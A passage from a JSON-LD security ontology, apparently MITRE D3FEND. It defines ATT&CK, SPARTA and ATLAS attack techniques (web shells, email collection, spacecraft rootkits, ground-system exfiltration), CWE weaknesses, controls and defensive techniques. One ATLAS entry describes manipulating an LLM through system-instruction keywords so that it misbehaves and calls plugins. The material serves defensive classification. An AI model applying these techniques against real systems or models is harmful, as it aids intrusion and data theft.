      "d3f:definition": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).",
      "d3f:may-execute": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:GetSystemNetworkConfigValue"
        }
      ],
      "rdfs:label": "System Network Configuration Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:Nc15d5c95772b40b4953f587386067596"
        },
        {
          "@id": "_:N68c8656043fc44a8a1bfdaae1b507b00"
        },
        {
          "@id": "_:N6e1d8ae8d14142e4aba4d91f4423ca86"
        }
      ]
    },
    {
      "@id": "_:Nc15d5c95772b40b4953f587386067596",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-execute"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:N68c8656043fc44a8a1bfdaae1b507b00",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N6e1d8ae8d14142e4aba4d91f4423ca86",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemNetworkConfigValue"
      }
    },
    {
      "@id": "d3f:T1204.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1204.003",
      "d3f:definition": "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)",
      "rdfs:label": "Malicious Image",
      "rdfs:subClassOf": {
        "@id": "d3f:T1204"
      }
    },
    {
      "@id": "d3f:disables",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x disables y: The technique or agent x makes an entity y unable to perform its actions or capabilities.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00513267-v"
      },
      "rdfs:label": "disables",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:evicts"
        },
        {
          "@id": "d3f:may-disable"
        },
        {
          "@id": "d3f:modifies"
        }
      ]
    },
    {
      "@id": "d3f:T1114.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:MailServer"
      },
      "d3f:attack-id": "T1114.002",
      "d3f:definition": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.",
      "rdfs:label": "Remote Email Collection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1114"
        },
        {
          "@id": "_:N2cc96fb8c59341efb181c27a7f348ced"
        }
      ]
    },
    {
      "@id": "_:N2cc96fb8c59341efb181c27a7f348ced",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MailServer"
      }
    },
    {
      "@id": "d3f:CWE-439",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-439",
      "d3f:definition": "A's behavior or functionality changes with a new version of A, or a new environment, which is not known (or manageable) by B.",
      "d3f:synonym": "Functional change",
      "rdfs:label": "Behavioral Change in New Version or Environment",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-435"
      }
    },
    {
      "@id": "d3f:CCI-000058_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides the capability for users to directly initiate session lock mechanisms.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-19T00:00:00"
      },
      "rdfs:label": "CCI-000058"
    },
    {
      "@id": "d3f:NetworkTimeServer",
      "@type": "owl:Class",
      "d3f:definition": "A network time server is a server computer that reads the actual time from a reference clock and distributes this information to its clients using a computer network. The time server may be a local network time server or an internet time server. The time server may also be a stand-alone hardware device. It can use NTP (RFC5905) or other protocols.",
      "rdfs:label": "Network Time Server",
      "rdfs:seeAlso": {
        "@id": "dbr:Time_server"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:CWE-685",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-685",
      "d3f:definition": "The product calls a function, procedure, or routine, but the caller specifies too many arguments, or too few arguments, which may lead to undefined behavior and resultant weaknesses.",
      "rdfs:label": "Function Call With Incorrect Number of Arguments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-628"
      }
    },
    {
      "@id": "d3f:T1092",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1092",
      "d3f:definition": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system.(Citation: ESET Sednit USBStealer 2014) Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.",
      "d3f:modifies": {
        "@id": "d3f:RemovableMediaDevice"
      },
      "rdfs:label": "Communication Through Removable Media",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N506089399fbc403283e80400a6a953a2"
        }
      ]
    },
    {
      "@id": "_:N506089399fbc403283e80400a6a953a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "d3f:may-be-created-by",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:may-create"
      },
      "rdfs:label": "may-be-created-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:PhysicalKeyLock",
      "@type": "owl:Class",
      "d3f:definition": "A mechanical locking device for securing moveable portions of physical barriers (e.g., doors, gates, drawers) in a secured position.",
      "d3f:synonym": "keyed lock",
      "rdfs:isDefinedBy": "NRC Regulatory Guide 5.12 Rev1",
      "rdfs:label": "Physical Key Lock",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLock"
        },
        {
          "@id": "_:N207daccbe29249c19582c7818c7dc1bc"
        }
      ]
    },
    {
      "@id": "_:N207daccbe29249c19582c7818c7dc1bc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalKey"
      }
    },
    {
      "@id": "d3f:CWE-1118",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1118",
      "d3f:definition": "The documentation does not sufficiently describe the techniques that are used for error handling, exception processing, or similar mechanisms.",
      "rdfs:label": "Insufficient Documentation of Error Handling Techniques",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1059"
      }
    },
    {
      "@id": "d3f:T1128",
      "@type": "owl:Class",
      "d3f:attack-id": "T1128",
      "d3f:definition": "Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\\SOFTWARE\\Microsoft\\Netsh</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.007",
      "rdfs:label": "Netsh Helper DLL",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.007"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:T0816",
      "@type": "owl:Class",
      "d3f:attack-id": "T0816",
      "d3f:definition": "Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.",
      "rdfs:label": "Device Restart/Shutdown - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Device Restart/Shutdown"
    },
    {
      "@id": "d3f:OTReadCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Read or retrieve data.",
      "rdfs:label": "OT Read Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTProcessDataCommandEvent"
        },
        {
          "@id": "_:Ned949f8cd2594c308c45bd34d956ba97"
        }
      ]
    },
    {
      "@id": "_:Ned949f8cd2594c308c45bd34d956ba97",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTReadCommand"
      }
    },
    {
      "@id": "d3f:EX-0012.02",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.02",
      "d3f:definition": "Threat actors may rewrite the maps that tell software where to send and receive things. In publish/subscribe or message-queued flight frameworks, tables map message IDs to subscribers, opcodes to handlers, and pipes to processes; at interfaces, address/port maps define how traffic traverses bridges and gateways (e.g., SpaceWire node/port routes, 1553 RT/subaddress mappings, CAN IDs). By altering these structures, commands can be misdelivered, dropped, duplicated, or routed through unintended paths; telemetry can be redirected or blackholed; and handler bindings can be swapped so an opcode triggers the wrong function. Schedule/routing hybrids, used to sequence activities and distribute results, can be edited to reorder execution or to create feedback loops that occupy bandwidth and processor time. The result is control over who hears what and when, achieved by changing the lookup tables that underpin command/telemetry distribution rather than the code that processes them.",
      "rdfs:label": "Internal Routing Tables - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Internal Routing Tables"
    },
    {
      "@id": "d3f:Reference-SecureOneWayDataTransferUsingCommunicationInterfaceCircuitry",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8068415B2"
      },
      "d3f:kb-abstract": "Network interface circuitry for a secure one-way data transfer from a sender's computer (“Send Node”) to a receiver's computer (“Receive Node”) over a data link, such as an optical fiber or shielded twisted pair copper wire communication cable, comprising send-only network interface circuitry for transmitting data from the Send Node to the data link, and receive-only network interface circuitry for receiving the data from the data link and transmitting the received data to the Receive Node, wherein the send-only network interface circuitry is configured not to receive any data from the data link, and the receive-only network interface circuitry is configured not to send any data to the data link. The network interface circuitry may use various interface means such as PCI interface, USB connection, FireWire connection, or serial port connection for coupling to the Send Node and the Receive Node.",
      "d3f:kb-organization": "OWL Computing Technologies Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DirectionalNetworkLink"
      },
      "d3f:kb-reference-title": "Secure one-way data transfer using communication interface circuitry",
      "rdfs:label": "Reference - Secure one-way data transfer using communication interface circuitry"
    },
    {
      "@id": "d3f:CertificateTrustStore",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Certificate"
      },
      "d3f:definition": "A certificate truststore is used to store public certificates used to authenticate clients by the server for an SSL connection.",
      "rdfs:label": "Certificate Trust Store",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Public_key_certificate"
        },
        {
          "@id": "https://www.educative.io/edpresso/keystore-vs-truststore"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TrustStore"
        },
        {
          "@id": "_:Nf9f67447e646454093965e54c579382f"
        }
      ]
    },
    {
      "@id": "_:Nf9f67447e646454093965e54c579382f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "d3f:NetworkTrafficPolicyMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkTrafficPolicyMapping"
      ],
      "d3f:d3fend-id": "D3-NTPM",
      "d3f:definition": "Network traffic policy mapping identifies and models the allowed pathways of data at the network, transport, and/or application levels.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CiscoASR9000AccessListCommands"
      },
      "d3f:maps": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "d3f:queries": {
        "@id": "d3f:NetworkAgent"
      },
      "d3f:synonym": [
        "DLP Policy Mapping",
        "Firewall Mapping",
        "IPS Policy Mapping",
        "Web Security Gateway Policy Mapping"
      ],
      "rdfs:label": "Network Traffic Policy Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkMapping"
        },
        {
          "@id": "_:Nce944e56d953431ba0ec31dc2ddf8e4d"
        },
        {
          "@id": "_:Ncd9cbd217b3240448a592f45b77a340b"
        }
      ]
    },
    {
      "@id": "_:Nce944e56d953431ba0ec31dc2ddf8e4d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "_:Ncd9cbd217b3240448a592f45b77a340b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:queries"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkAgent"
      }
    },
    {
      "@id": "d3f:T1114",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Resource"
      },
      "d3f:attack-id": "T1114",
      "d3f:definition": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.",
      "rdfs:label": "Email Collection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Nb1ea3b2a7dae4e4e9686dd86e68dee7b"
        }
      ]
    },
    {
      "@id": "_:Nb1ea3b2a7dae4e4e9686dd86e68dee7b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:T1521.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1521.003",
      "d3f:definition": "Adversaries may use [SSL Pinning](https://attack.mitre.org/techniques/T1521/003)  to protect the C2 traffic from being intercepted and analyzed.",
      "rdfs:label": "SSL Pinning - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1521"
      },
      "skos:prefLabel": "SSL Pinning"
    },
    {
      "@id": "d3f:CWE-84",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-84",
      "d3f:definition": "The web application improperly neutralizes user-controlled input for executable script disguised with URI encodings.",
      "rdfs:label": "Improper Neutralization of Encoded URI Schemes in a Web Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:T1204",
      "@type": "owl:Class",
      "d3f:attack-id": "T1204",
      "d3f:definition": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).",
      "rdfs:label": "User Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:GenerativeAdversarialNetwork",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GAN",
      "d3f:definition": "Generative Adversarial Networks (GAN) are an approach to generative modeling using deep learning methods, such as convolutional neural networks.",
      "d3f:kb-article": "## References\nBrownlee, J. (2019). What Are Generative Adversarial Networks (GANs)? Machine Learning Mastery. [Link](https://machinelearningmastery.com/what-are-generative-adversarial-networks-gans/)",
      "d3f:synonym": "GAN",
      "rdfs:label": "Generative Adversarial Network",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedLearning"
      }
    },
    {
      "@id": "d3f:EvalFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Takes inputs of strings and evaluations them as expressions.",
      "d3f:invokes": {
        "@id": "d3f:Subroutine"
      },
      "rdfs:label": "Eval Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N34ed6ec6842c4c038ba9e7ae4d6e4d73"
        }
      ]
    },
    {
      "@id": "_:N34ed6ec6842c4c038ba9e7ae4d6e4d73",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:LinuxPauseThread",
      "@type": "owl:Class",
      "d3f:definition": "Causes the calling thread to sleep until a signal is delivered that either terminates the thread or causes the invocation of a signal-catching function.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/pause.2.html"
      },
      "rdfs:label": "Linux Pause Thread",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPISuspendThread"
      }
    },
    {
      "@id": "d3f:limits",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x limits y: The entity x specifies a designated limit beyond which some entity y cannot function or must be terminated.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13781154-n"
      },
      "rdfs:label": "limits",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13780436-n"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:restricts"
      },
      "skos:altLabel": "cutoff"
    },
    {
      "@id": "d3f:t-SNEClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TSC",
      "d3f:definition": "T-distributed Stochastic Neighbor Embedding (t-SNE) is a statistical method for visualizing high-dimensional data by giving each datapoint a location in a two or three-dimensional map.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). T-distributed stochastic neighbor embedding. [Link](https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding)",
      "rdfs:label": "t-SNE Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Projection-basedClustering"
      }
    },
    {
      "@id": "d3f:EXF-0007",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0007",
      "d3f:definition": "The adversary resides in mission ground infrastructure and uses its trusted position to siphon data at scale. With access to operator workstations, mission control servers, baseband/modem chains, telemetry processing pipelines, or archive databases, the attacker can mirror real-time streams, scrape recorder playbacks, export payload products, and harvest procedure logs and command histories. Because exfiltration rides normal paths, file staging areas, data distribution services, cloud relays, or cross-site links, it blends with routine dissemination. Compromise of scheduling tools and pass plans also lets the actor time captures to high-value downlinks and automate bulk extraction without touching the spacecraft.",
      "rdfs:label": "Compromised Ground System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0007/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Compromised Ground System"
    },
    {
      "@id": "d3f:CWE-492",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-492",
      "d3f:definition": "Inner classes are translated into classes that are accessible at package scope and may expose code that the programmer intended to keep private to attackers.",
      "rdfs:label": "Use of Inner Class Containing Sensitive Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:T1100",
      "@type": "owl:Class",
      "d3f:attack-id": "T1100",
      "d3f:definition": "A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1505.003",
      "rdfs:label": "Web Shell",
      "rdfs:seeAlso": {
        "@id": "d3f:T1505.003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1222",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1222",
      "d3f:definition": "The product defines a large address region protected from modification by the same register lock control bit. This results in a conflict between the functional requirement that some addresses need to be writable by software during operation and the security requirement that the system configuration lock bit must be set during the boot process.",
      "rdfs:label": "Insufficient Granularity of Address Regions Protected by Register Locks",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1220"
      }
    },
    {
      "@id": "d3f:AML.T0069.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0069.001",
      "d3f:definition": "Adversaries may discover keywords that have special meaning to the large language model (LLM), such as function names or object names. These can later be exploited to confuse or manipulate the LLM into misbehaving and to make calls to plugins the LLM has access to.",
      "rdfs:label": "System Instruction Keywords - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0069.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0069"
      },
      "skos:prefLabel": "System Instruction Keywords"
    },
    {
      "@id": "d3f:ContainerProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A running instance of a container image.",
      "rdfs:label": "Container Process",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ContainerImage"
        },
        {
          "@id": "https://schema.ocsf.io/objects/container"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationProcess"
      }
    },
    {
      "@id": "d3f:ProductDeveloper",
      "@type": "owl:Class",
      "d3f:definition": "A product developer intentionally designs, creates, or improves products, which may include physical goods, software, or other outputs.",
      "rdfs:label": "Product Developer",
      "rdfs:subClassOf": {
        "@id": "d3f:Provider"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-11_8",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Testing and Evaluation | Dynamic Code Analysis",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:ApplicationHardening"
      },
      "rdfs:label": "SA-11(8)"
    },
    {
      "@id": "d3f:CWE-501",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-501",
      "d3f:definition": "The product mixes trusted and untrusted data in the same data structure or structured message.",
      "rdfs:label": "Trust Boundary Violation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:T1104",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1104",
      "d3f:definition": "Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Multi-Stage Channels",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:Nd7d4b94017c04168bf934d348c16e81d"
        }
      ]
    },
    {
      "@id": "_:Nd7d4b94017c04168bf934d348c16e81d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Reference-DataExecutionPrevention_Microsoft",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10#data-execution-prevention"
      },
      "d3f:kb-abstract": "Malware depends on its ability to insert a malicious payload into memory with the hope that it will be executed later. Wouldn't it be great if you could prevent malware from running if it wrote to an area that has been allocated solely for the storage of information?\n\nData Execution Prevention (DEP) does exactly that, by substantially reducing the range of memory that malicious code can use for its benefit. DEP uses the No eXecute bit on modern CPUs to mark blocks of memory as read-only so that those blocks can't be used to execute malicious code that may be inserted by means of a vulnerability exploit.",
      "d3f:kb-author": "Nick Schonning, Daniel Simpson, Marty Hernandez Avedon, Trond B. Krokli, jreeds, jcaparas, Andres Mariano Gorzelany, Tina Burden, Thomas Raya, Justin Hall, justanotheranonymoususer, Liza Poggemeyer, Dani Halfin, imba-tjd (Authors for entire page)",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSegmentExecutionPrevention"
      },
      "d3f:kb-reference-title": "Mitigate threats by using Windows 10 security features: Data Execution Prevention",
      "rdfs:label": "Reference - Mitigate threats by using Windows 10 security features: Data Execution Prevention - Microsoft"
    },
    {
      "@id": "d3f:SSHConnectionOpenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the successful establishment of an SSH connection between a client and a server, marking the initiation of a secure session.",
      "rdfs:label": "SSH Connection Open Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkConnectionOpenEvent"
        },
        {
          "@id": "d3f:SSHEvent"
        }
      ]
    },
    {
      "@id": "d3f:T1564.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.001",
      "d3f:definition": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).",
      "d3f:modifies": {
        "@id": "d3f:FileSystemMetadata"
      },
      "rdfs:label": "Hidden Files and Directories",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N5efd1d6c9984475ba9268bf766c4f02a"
        }
      ]
    },
    {
      "@id": "_:N5efd1d6c9984475ba9268bf766c4f02a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:DE-0007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0007",
      "d3f:definition": "A rootkit hides malicious activity by interposing on reporting paths after the system has booted. In flight contexts this includes patching flight software APIs, kernel syscalls, message queues, and telemetry publishers so task lists, counters, health channels, and event severities are falsified before downlink. Command handlers can be hooked to suppress evidence of certain opcodes or sources; recorder catalogs and file listings can be rewritten on the fly; and housekeeping can be biased to show nominal temperatures, currents, or voltages while actions proceed. The defining feature is runtime concealment: the observability surfaces operators rely on are altered to present a curated, benign narrative.",
      "d3f:modifies": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:Kernel"
        },
        {
          "@id": "d3f:KernelModule"
        },
        {
          "@id": "d3f:SystemFirmware"
        }
      ],
      "rdfs:label": "Evasion via Rootkit - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0007/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTADefenseEvasionTechnique"
        },
        {
          "@id": "_:N4447fe2af868440ea9ce6d357d558baf"
        },
        {
          "@id": "_:Nd416736b673b46f3956685aab84898b0"
        },
        {
          "@id": "_:Nf8dbb5a9adc74e3cb9a29dfc05230661"
        },
        {
          "@id": "_:Nf8985da1e3f148e7814cb7deaff2ed99"
        }
      ],
      "skos:prefLabel": "Evasion via Rootkit"
    },
    {
      "@id": "_:N4447fe2af868440ea9ce6d357d558baf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:Nd416736b673b46f3956685aab84898b0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "_:Nf8dbb5a9adc74e3cb9a29dfc05230661",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "_:Nf8985da1e3f148e7814cb7deaff2ed99",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirmware"
      }
    },
    {
      "@id": "d3f:T1497",
      "@type": "owl:Class",
      "d3f:attack-id": "T1497",
